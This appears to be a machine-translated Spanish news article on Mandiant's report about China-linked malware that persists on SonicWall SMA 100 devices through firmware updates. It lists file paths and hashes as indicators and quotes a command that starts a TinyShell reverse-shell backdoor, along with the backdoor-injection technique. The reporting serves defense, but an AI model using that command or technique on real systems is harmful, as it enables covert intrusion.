Territorio Móvil

El malware que infecta aplicaciones de seguridad populares sobrevive a las actualizaciones de firmware

Los actores de amenazas con vínculos con el gobierno chino infectan una popular aplicación de seguridad de SonicWall con malware que permanece activo incluso después de que el dispositivo recibe actualizaciones de firmware, dijeron los investigadores. Secure Mobile Access 100 de SonicWall es un dispositivo de acceso remoto seguro que ayuda a las organizaciones a implementar trabajadores remotos de manera segura. Los clientes lo utilizan para otorgar controles de acceso granular a usuarios remotos, proporcionar conexiones VPN a redes corporativas y establecer perfiles únicos para cada empleado. El acceso del SMA 100 a las redes de los clientes lo convierte en un objetivo atractivo para los actores de amenazas. En 2021, el dispositivo fue atacado por piratas informáticos sofisticados que explotaron lo que entonces era una vulnerabilidad de día cero. Las aplicaciones de seguridad de Fortinet y Pulse Secure se han enfrentado a ataques similares en los últimos años.

Obtener persistencia a largo plazo dentro de las redes

El jueves, la firma de seguridad Mandiant publicó un informe que indica que los actores de amenazas con una presunta conexión con China estaban involucrados en una campaña para mantener la persistencia a largo plazo mediante la ejecución de malware en dispositivos SonicWall SMA sin parches. La campaña se destacó por la capacidad del malware de permanecer en los dispositivos incluso después de que su firmware recibiera un nuevo firmware. «Los atacantes han puesto un esfuerzo significativo en la estabilidad y durabilidad de sus herramientas», escriben los investigadores de Mandiant Daniel Lee, Stephen Eckels y Ben Read. “Esto les permite permanecer en la red a través de actualizaciones de firmware y obtener un punto de apoyo en la red a través del dispositivo SonicWall.” Para lograr esta persistencia, el malware busca actualizaciones de firmware disponibles cada 10 segundos. Cuando una actualización está disponible, el malware copia el archivo archivado para hacer una copia de seguridad, lo descomprime, lo monta y luego copia todo el paquete de archivos maliciosos en él. El malware también agrega un usuario raíz de puerta trasera al archivo montado. Luego, el malware vuelve a comprimir el archivo, listo para la instalación. «La técnica no es particularmente sofisticada, pero requiere un esfuerzo significativo por parte del atacante para comprender el ciclo de actualización del dispositivo y luego desarrollar y probar un método de persistencia», escribieron los investigadores. Las técnicas de persistencia son consistentes con una campaña de ataque de 2021 que usó 16 familias de malware para infectar dispositivos Pulse Secure. Mandiant atribuyó los ataques a múltiples grupos de amenazas, incluidos los rastreados como UNC2630, UNC2717, que según la compañía respaldan «prioridades clave del gobierno chino». Mandiant atribuye los ataques en curso a los clientes de SonicWall SMA 100 a un grupo rastreado como UNC4540. «En los últimos años, los atacantes chinos han utilizado múltiples exploits de día cero y malware contra una variedad de dispositivos de red conectados a Internet como una ruta para la penetración total de la empresa, y la instancia reportada aquí es parte de un patrón reciente que Mandiant espera que continuará a corto plazo», escribieron los investigadores de Mandiant en el informe del jueves.

Acceso altamente privilegiado

El propósito principal del malware parece ser robar contraseñas criptográficamente cifradas para todos los usuarios registrados. También proporciona un shell web que el atacante puede usar para instalar nuevo malware. «El análisis de un dispositivo comprometido reveló una colección de archivos que otorgan al atacante un acceso altamente privilegiado y disponible al dispositivo», escribieron los investigadores en el informe del jueves. «El malware consta de una serie de scripts bash y un solo binario ELF identificado como una variante de TinyShell. El comportamiento general del conjunto de scripts bash maliciosos demuestra una comprensión detallada del dispositivo y está bien adaptado al sistema para garantizar la estabilidad y la persistencia». La lista de malware es:

Lejos hachís función
/bin/cortafuegos e4117b17e3d14fe64f45750be71dbaa6 proceso principal de malware
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e Puerta trasera TinyShell
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Persistencia de arranque para firewalld
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Proceso principal de malware redundante
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Script de puerta trasera de firmware
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Script de apagado elegante

El informe continuó:

El punto de entrada principal para el malware es un script bash llamado firewalld, que ejecuta su ciclo principal una vez para contar cada archivo en el sistema al cuadrado: …para j en $(ls / -R) para i en $(ls / -R) . ) do:… El script se encarga de ejecutar un comando SQL para lograr el robo de credenciales y ejecutar los demás componentes. La primera función en firewalld ejecuta la puerta trasera TinyShell httpsd con el comando nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 y si el proceso httpsd aún no se está ejecutando. Esto pone a TinyShell en modo shell inverso y le indica que llame a la dirección IP y al puerto anteriores a una hora y un día específicos representados por el indicador -m, con un intervalo de baliza representado por el indicador -d definido. El binario incorpora una dirección IP codificada que se usa en el modo shell inverso si el argumento de la dirección IP se deja en blanco. También está disponible un modo de shell de enlace de escucha.

Los investigadores dijeron que no sabían cuál era el vector de infección original. La semana pasada, SonicWall publicó un aviso instando a los usuarios de SMA 100 a actualizar a la versión 10.2.1.7 o posterior. Estas versiones incluyen mejoras tales como monitoreo de integridad de archivos e identificación de procesos anormales. El parche está disponible aquí. Los usuarios también deben revisar periódicamente los registros en busca de signos de compromiso, incluidos inicios de sesión anormales o tráfico interno.

MÁS SOBRE ACTUALIDAD
GM anuncia el nuevo Chevrolet Bolt basado en Ultium en el informe del segundo trimestre
El bórax es la nueva marea y los expertos en control de envenenamiento lo están mirando a la cara.
SpaceX anuncia otra aplicación para Starship
La nueva función de personalización de ChatGPT podría ahorrar mucho tiempo a los usuarios
¿Listo para su escaneo ocular? Comienza Worldcoin, pero no del todo en todo el mundo
Entendiendo al pulpo y sus relaciones con los humanos

Deja una respuesta

Tu dirección de correo electrónico no será publicada.